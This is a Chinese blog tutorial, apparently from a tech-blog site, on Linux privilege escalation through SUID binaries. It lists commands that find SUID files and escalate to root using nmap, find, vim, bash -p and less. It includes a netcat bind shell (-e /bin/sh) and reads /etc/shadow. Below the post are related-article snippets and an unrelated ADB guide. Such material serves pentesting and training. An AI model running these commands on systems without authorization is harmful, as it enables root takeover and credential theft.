Linux提权————利用SUID提权

最新推荐文章于 2025-05-20 14:42:05 发布
最新推荐文章于 2025-05-20 14:42:05 发布
阅读量2.7w 收藏 77
点赞数 17
本文介绍了Linux系统中利用SUID权限进行提权的方法。详细列举了Nmap、Vim等常见工具的提权操作,并提供了具体的命令示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

今天给大家带来的是linux下的提权技巧。

SUID是Linux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具来进行root提权。

已知的可用来提权的linux可行性的文件列表如下:

  • Nmap
  • Vim
  • find
  • Bash
  • More
  • Less
  • Nano
  • cp

以下命令可以发现系统上运行的所有SUID可执行文件。具体来说,命令将尝试查找具有root权限的SUID的文件。

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

以上所有二进制文件都将以root用户权限执行,因为它们的权限中包含"s",并且对应的是root权限。

ls -l /usr/bin/nmap
-rwsr-xr-x 1 root root 780676 2008-04-08 10:04 /usr/bin/nmap

NMAP

较旧版本的Nmap(2.02至5.21)具有交互模式,允许用户执行shell命令。由于Nmap在使用root权限执行的二进制文件列表中,因此可以使用交互式控制台来运行具有相同权限的shell。

nmap -V

交互模式可以通过执行Nmap参数" interactive "

nmap --interactive

以下命令将提供一个提升的shell。

nmap> !sh
sh-3.2# whoami
root

也可以通过Metasploit模块对Nmap的二进制文件进行权限提升。

exploit/unix/local/setuid_nmap

Find

如果Find命令也是以Suid权限运行的话,则将通过find执行的所有命令都会以root权限执行。

touch pentestlab
find pentestlab -exec whoami \;

大部分Linux操作系统都安装了netcat,因此也可以被利用来将权限提升至root。

find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;

连接上去就会直接获取到一个Root权限的shell。

netcat 192.168.1.189 5555
id
cat /etc/shadow

VIM

Vim是Linux环境下的一款文件编辑器。但是,如果以SUID运行的话,它会继承root用户的权限,因此可以读取系统上的所有文件。

vim.tiny /etc/shadow

vim.tiny
# Press ESC key
:set shell=/bin/sh
:shell

Bash

以下命令将以root权限打开一个bash shell。

bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(serv

Less

Less和More都执行以用来提权。

less /etc/passwd
!/bin/sh


获取到Root权限

参考资料

https://pentestlab.blog/2017/09/25/suid-executables/

http://blog.youkuaiyun.com/haofeifei6/article/details/11516753

威胁情报分析平台

最近在做一些威胁情报分析,apt攻击源分析中,发现了一个很好的平台,给大家推荐一下。

http://www.secange.com/2017/10/%E5%A8%81%E8%83%81%E6%83%85%E6%8A%A5%E5%88%86%E6%9E%90%E5%B9%B3%E5%8F%B0/

平台地址:http://www.vxcube.com

 

Linux权——环境变量配合SUID&计划任务&第三方数据库
m0_61506558的博客
01-27 841
原始的ps命令,由于环境变量加了tmp,执行ps,即执行/tmp/ps,同时ps是通过bash复制过来的,./shell用SUID执行bash直接进行了取。
学习之旅——Linux操作系统
Lemon's blog
08-19 3166
前言: 上次学习了Windows操作系统的以及相关工具的利用,这次就来学习一下Linux操作系统的 Linux基础 0x00:Linux方法 大致归纳总结如下:
后渗透——Windows/Linux&&横向笔记
未完成的歌~的博客
02-28 1059
在渗透工作中,当我们拿到某一台服务器的的 shell 后,肯定要进行横向渗透或者操作,因此今天来总结一下后渗透中,横向以及的一些操作方法。
suidlinux
weixin_68652890的博客
04-15 1113
suid suid(设置用户的id)是Linux中的一种特殊限,当运行具有suid限的二进制文件的时候,使得调用者暂时获得该文件拥有者的限(比如a文件拥有者是root,且被赋予了s限,当我们用另外一个普通用户调用a文件的时候,调用过程中这个普通用户会获得root限) 除了经常看见的rwx限还有s限 s限,设置使文件在执行阶段具有文件所有者的限,相当于临时拥有文件所有者的身份。 SUID 当执行的文件被赋予了s限,就被称为Set UID,简称为SUID的特殊限。简称为SUID的特殊
黑客在Linux系统下的20种主要姿势!(非常详细)从零基础到精通,收藏这篇就够了!
最新发布
Libra1313的博客
05-20 1122
下面这20种姿势,从入门到入土,看完保证你对Linux的“爱”更深沉。黑客利用竞争条件,直接往只读内存里写东西,想想都刺激。,Docker容器限,Redis认证,MySQL的UDF…因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。:sudo缓冲区溢出,密码都不用输,直接root。组件的双重释放漏洞,释放了又释放,刺激不?
Linux SUID
zmx999999的博客
03-23 522
GTFOBins 是一个专注于 Unix/Linux 系统(Privilege Escalation)和限绕过(Bypass) 的威开源项目,它收集了大量常见系统程序(如 find、vim、nmap 等)的利用方法,帮助安全研究人员和 CTF 选手快速识别和利用配置不当的程序获取更高限。
Linux:SUID
Elite的博客
03-05 3007
以find命令为例,讲解SUID原理
LinuxSUID
CP1024的博客
04-04 4108
LinuxSUID SUID 1. SUID限只能设置二进制文件 2. 命令执行者要有二进制文件的执行 3. 命令执行者执行二进制文件时会获得该程序的属主身份 4. SUID限只在程序执行中有效 即如果root给一个程序赋予了SUID限,则普通用户在执行该程序过程中,是root限 cp命令 以cp为例,这里给cp添加SUID限做测试,拥有SUID限的程序会由rwx变成rws 也可以通过find / -perm -u=s -type f 2>dev/null命令来
linux suid
qq_42307546的博客
04-15 725
SUID是赋予文件的一种限,它会出现在文件拥有者限的执行位上,具有这种限的文件会在其执行 时,使调用者暂时获得该文件拥有者的限。也就是如果ROOT用户给某个可执行文件加了S限,那么 该执行程序运行的时候将拥有ROOT限 以下命令可以发现系统上运行的所有SUID可执行文件 find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000-print2>/dev/null find / -user root -perm
linux权—大赏
qq_55202378的博客
04-20 1652
我的理解是:靶机的shell标准输入、输出、错误输出都与127.0.0.1:4444的输出建立了TCP连接,也就是说靶机shell所有的输出信息都会显示到监听127.0.0.1:4444的shell中,唯独没有解决从127.0.0.1:4444向靶机发送命令。文件中,每个用户的密码都是用一个特定的哈希函数加密的。查看当前系统的自动任务后,一方面可以定位定时脚本的位置,然后将shell写到定时脚本中,实现;时本来就是root限,预先加载共享库shell.so时,也是以root用户的限去加载的。
升-linux手法总结.zip
05-08
以下是对"升——Linux手法总结"的详细说明: 1. **缓冲区溢出(Buffer Overflow)**:这是经典的漏洞。当程序处理用户输入时,如果没有正确检查边界,可能会导致内存溢出,从而覆盖函数返回地址,...
Linux常见方式
L_erAry的博客
08-11 2803
taskset命令用于设置进程(或 线程)的处理器亲和性(Processor Affinity),可以将进程(或 线程)绑定到特定的一个 或 多个CPU上去执行,而不允许将进程(或 线程)调度到其他的CPU上。在Linux/Unix中,/etc/sudoers文件是sudo限的配置文件,其中储存了一些用户或组可以以root限使用的命令。使用方法是,创建一个临时的文件,并在其中构建一个包来调用/bin/bash,然后通过apt-get安装该包。通过压缩一个存在的文件,并调用-T参数输出shell。
Linux Suid
YouthBelief的博客
12-21 799
Suid 原理 SUID(设置用户ID)是一种限类型,它被赋予一个文件,允许用户以其所有者的限执行该文件。Linux二进制文件可以拥有这种类型的限集有很多原因。例如,ping实用程序需要root限才能打开网络套接字,但它也需要由标准用户执行,以验证与其他主机的连通性。 但是,如果某些现有的二进制文件和实用程序具有 SUID 限,则它们可用于将升为 root。 suid限 表示 chmod u+s 如下 二进制文件以 root 限执行,因为它们的限中包含“ s ”,并且它们归 roo
linux系统suid
focus on security
05-19 5816
SUID 0x01什么是SUIDSUID (Set UID)是Linux中的一种特殊限,其功能为用户运行某个程序时,如果该程序有SUID限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义. ​ 在执行过程中,调用者会暂时获得该文件的所有者限,且该限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果
SUID
热门推荐
一只web狗
07-01 1万+
SUID介绍
windows安装adb教程
07-28
为了在Windows上安装ADB工具,你可以按照以下步骤进行操作: 1. 首先,下载ADB工具包并解压缩到你自定义的安装目录。你可以选择将其解压缩到任何你喜欢的位置。 2. 打开运行窗口,可以通过按下Win+R键来快速打开。在运行窗口中输入"sysdm.cpl"并按下回车键。 3. 在系统属性窗口中,选择"高级"选项卡,然后点击"环境变量"按钮。 4. 在环境变量窗口中,选择"系统变量"部分,并找到名为"Path"的变量。点击"编辑"按钮。 5. 在编辑环境变量窗口中,点击"新建"按钮,并将ADB工具的安装路径添加到新建的路径中。确保路径正确无误后,点击"确定"按钮。 6. 返回到桌面,打开命令示符窗口。你可以通过按下Win+R键,然后输入"cmd"并按下回车键来快速打开命令示符窗口。 7. 在命令示符窗口中,输入"adb version"命令来验证ADB工具是否成功安装。如果显示版本信息,则表示安装成功。 这样,你就成功在Windows上安装了ADB工具。你可以使用ADB工具来执行各种操作,如枚举设备、进入/退出ADB终端、文件传输、运行命令、查看系统日志等。具体的操作方法可以参考ADB工具的官方文档或其他相关教程。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [windows环境安装adb驱动](https://blog.youkuaiyun.com/zx54633089/article/details/128533343)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Windows下安装使用ADB,简单易懂教程](https://blog.youkuaiyun.com/m0_37777700/article/details/129836351)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值